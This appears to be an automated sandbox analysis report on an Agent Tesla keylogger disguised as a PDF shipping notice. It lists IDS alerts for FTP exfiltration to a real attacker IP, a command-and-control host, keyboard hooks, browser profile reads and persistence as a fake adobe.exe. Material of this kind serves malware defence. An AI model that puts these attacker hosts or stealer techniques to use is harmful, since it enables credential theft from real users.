Source: Network traffic	Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.6:49714 -> 213.189.52.181:21
Source: Network traffic	Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.6:49729 -> 213.189.52.181:63877
Source: Network traffic	Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.6:49728 -> 213.189.52.181:21

Source: Arrival Notice - BL 713410220035.PDF.exe, 00000002.00000002.4609963887.0000000002AAC000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.2364755330.000000000358C000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4611154293.0000000002EBC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s4.serv00.com
Source: Arrival Notice - BL 713410220035.PDF.exe, 00000002.00000002.4609963887.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.2364755330.0000000003511000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4611154293.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Arrival Notice - BL 713410220035.PDF.exe, 00000000.00000002.2147638567.00000000037E9000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.2361618882.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: Arrival Notice - BL 713410220035.PDF.exe, 00000000.00000002.2147638567.00000000037E9000.00000004.00000800.00020000.00000000.sdmp, Arrival Notice - BL 713410220035.PDF.exe, 00000002.00000002.4609963887.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.2361618882.0000000000402000.00000040.00000400.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.2364755330.0000000003511000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4611154293.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: Arrival Notice - BL 713410220035.PDF.exe, 00000002.00000002.4609963887.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.2364755330.0000000003511000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4611154293.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: Arrival Notice - BL 713410220035.PDF.exe, 00000002.00000002.4609963887.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.2364755330.0000000003511000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4611154293.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726

Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.6:49726 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.3932e10.2.raw.unpack, JovGVW.cs	.Net Code: _5PXjwm
Source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.396e440.3.raw.unpack, JovGVW.cs	.Net Code: _5PXjwm

Installs a global keyboard hook

Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\adobe\adobe.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\adobe\adobe.exe	Jump to behavior

Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.396e440.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.396e440.3.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.3932e10.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.3932e10.2.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 5.2.adobe.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.adobe.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.396e440.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.396e440.3.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.3932e10.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.3932e10.2.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.3852970.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.3852970.4.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen

Initial sample is a PE file and has a suspicious name

Source: initial sample	Static PE information: Filename: Arrival Notice - BL 713410220035.PDF.exe
Source: initial sample	Static PE information: Filename: Arrival Notice - BL 713410220035.PDF.exe

Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Code function: 0_2_025ECAC4	0_2_025ECAC4
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Code function: 0_2_025EF578	0_2_025EF578
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Code function: 0_2_025EF568	0_2_025EF568
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Code function: 2_2_00FCB397	2_2_00FCB397
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Code function: 2_2_00FC4A90	2_2_00FC4A90
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Code function: 2_2_00FCEEA8	2_2_00FCEEA8
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Code function: 2_2_00FC3E78	2_2_00FC3E78
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Code function: 2_2_00FC41C0	2_2_00FC41C0
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Code function: 2_2_066D1BC4	2_2_066D1BC4
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Code function: 2_2_066D28A8	2_2_066D28A8
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Code function: 2_2_066D289B	2_2_066D289B
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Code function: 2_2_066D3593	2_2_066D3593
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Code function: 2_2_06723018	2_2_06723018
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Code function: 2_2_0672C0F8	2_2_0672C0F8
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Code function: 2_2_06726160	2_2_06726160
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Code function: 2_2_06725150	2_2_06725150
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Code function: 2_2_0672AD90	2_2_0672AD90
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Code function: 2_2_067278F8	2_2_067278F8
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Code function: 2_2_06727218	2_2_06727218
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Code function: 2_2_06722340	2_2_06722340
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Code function: 2_2_0672E328	2_2_0672E328
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Code function: 2_2_06720040	2_2_06720040
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Code function: 2_2_06720007	2_2_06720007
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Code function: 2_2_0672584F	2_2_0672584F
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 4_2_0310CAC4	4_2_0310CAC4
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 4_2_0310F578	4_2_0310F578
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 4_2_0310F568	4_2_0310F568
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_017C4A90	5_2_017C4A90
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_017C3E78	5_2_017C3E78
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_017C41C0	5_2_017C41C0
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_017CDDC8	5_2_017CDDC8
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_06EE079C	5_2_06EE079C
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_06EE2008	5_2_06EE2008
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_06EE2002	5_2_06EE2002
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_06EE2CFE	5_2_06EE2CFE
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_06EF3418	5_2_06EF3418
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_06EF6560	5_2_06EF6560
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_06EF5550	5_2_06EF5550
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_06EFC0F8	5_2_06EFC0F8
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_06EFB198	5_2_06EFB198
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_06EF7CF8	5_2_06EF7CF8
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_06EF7618	5_2_06EF7618
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_06EF2741	5_2_06EF2741
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_06EFE328	5_2_06EFE328
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_06EF0040	5_2_06EF0040
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_06EF5C4F	5_2_06EF5C4F
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_06EF001F	5_2_06EF001F
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_0171CAC4	7_2_0171CAC4
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_0171F578	7_2_0171F578
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_0171F568	7_2_0171F568
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 8_2_0124A5D0	8_2_0124A5D0
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 8_2_01244A90	8_2_01244A90
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 8_2_0124ADA8	8_2_0124ADA8
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 8_2_01243E78	8_2_01243E78
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 8_2_012441C0	8_2_012441C0
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 8_2_06A82750	8_2_06A82750
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 8_2_06A87CF8	8_2_06A87CF8
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 8_2_06A8C0F8	8_2_06A8C0F8
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 8_2_06A8B1A8	8_2_06A8B1A8
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 8_2_06A86560	8_2_06A86560
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 8_2_06A85550	8_2_06A85550
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 8_2_06A87618	8_2_06A87618
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 8_2_06A8E328	8_2_06A8E328
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 8_2_06A85C60	8_2_06A85C60
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 8_2_06A80040	8_2_06A80040
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 8_2_06A80006	8_2_06A80006

Source: Arrival Notice - BL 713410220035.PDF.exe, 00000000.00000002.2149999395.0000000004E90000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameExample.dll0 vs Arrival Notice - BL 713410220035.PDF.exe
Source: Arrival Notice - BL 713410220035.PDF.exe, 00000000.00000002.2146537783.00000000009EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Arrival Notice - BL 713410220035.PDF.exe
Source: Arrival Notice - BL 713410220035.PDF.exe, 00000000.00000000.2139997754.0000000000466000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamechrome.exe< vs Arrival Notice - BL 713410220035.PDF.exe
Source: Arrival Notice - BL 713410220035.PDF.exe, 00000000.00000002.2150284020.0000000004F40000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs Arrival Notice - BL 713410220035.PDF.exe
Source: Arrival Notice - BL 713410220035.PDF.exe, 00000000.00000002.2147483427.00000000027E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs Arrival Notice - BL 713410220035.PDF.exe
Source: Arrival Notice - BL 713410220035.PDF.exe, 00000000.00000002.2147483427.00000000027E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamea9d26a1c-7dc5-441c-98a8-6dd01f6d79df.exe4 vs Arrival Notice - BL 713410220035.PDF.exe
Source: Arrival Notice - BL 713410220035.PDF.exe, 00000000.00000002.2147483427.00000000027E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameriched20.dllp( vs Arrival Notice - BL 713410220035.PDF.exe
Source: Arrival Notice - BL 713410220035.PDF.exe, 00000000.00000002.2147483427.00000000027E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs Arrival Notice - BL 713410220035.PDF.exe
Source: Arrival Notice - BL 713410220035.PDF.exe, 00000000.00000002.2147483427.00000000027E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q,\\StringFileInfo\\000004B0\\OriginalFilename vs Arrival Notice - BL 713410220035.PDF.exe
Source: Arrival Notice - BL 713410220035.PDF.exe, 00000000.00000002.2147638567.00000000037E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameExample.dll0 vs Arrival Notice - BL 713410220035.PDF.exe
Source: Arrival Notice - BL 713410220035.PDF.exe, 00000000.00000002.2147638567.00000000037E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamea9d26a1c-7dc5-441c-98a8-6dd01f6d79df.exe4 vs Arrival Notice - BL 713410220035.PDF.exe
Source: Arrival Notice - BL 713410220035.PDF.exe, 00000002.00000002.4606001211.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Arrival Notice - BL 713410220035.PDF.exe
Source: Arrival Notice - BL 713410220035.PDF.exe	Binary or memory string: OriginalFilenamechrome.exe< vs Arrival Notice - BL 713410220035.PDF.exe

Source: Arrival Notice - BL 713410220035.PDF.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.396e440.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.396e440.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.3932e10.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.3932e10.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 5.2.adobe.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.adobe.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.396e440.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.396e440.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.3932e10.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.3932e10.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.3852970.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.3852970.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload

Source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.3932e10.2.raw.unpack, yNzg.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.3932e10.2.raw.unpack, yNzg.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.3932e10.2.raw.unpack, yNzg.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.3932e10.2.raw.unpack, yNzg.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.3932e10.2.raw.unpack, KNymkUU5gB.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.3932e10.2.raw.unpack, KNymkUU5gB.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.3932e10.2.raw.unpack, LPE.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.3932e10.2.raw.unpack, LPE.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.4e90000.5.raw.unpack, DarkComboBox.cs	Base64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
Source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.3852970.4.raw.unpack, DarkComboBox.cs	Base64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@9/2@3/2

Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe

File created: C:\Users\user\AppData\Roaming\adobe\adobe.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe

Mutant created: NULL

Source: Arrival Notice - BL 713410220035.PDF.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Arrival Notice - BL 713410220035.PDF.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Arrival Notice - BL 713410220035.PDF.exe	ReversingLabs: Detection: 63%
Source: Arrival Notice - BL 713410220035.PDF.exe	Virustotal: Detection: 56%

Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe

File read: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe "C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe"
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process created: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe "C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process created: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe "C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Section loaded: msls31.dll	Jump to behavior
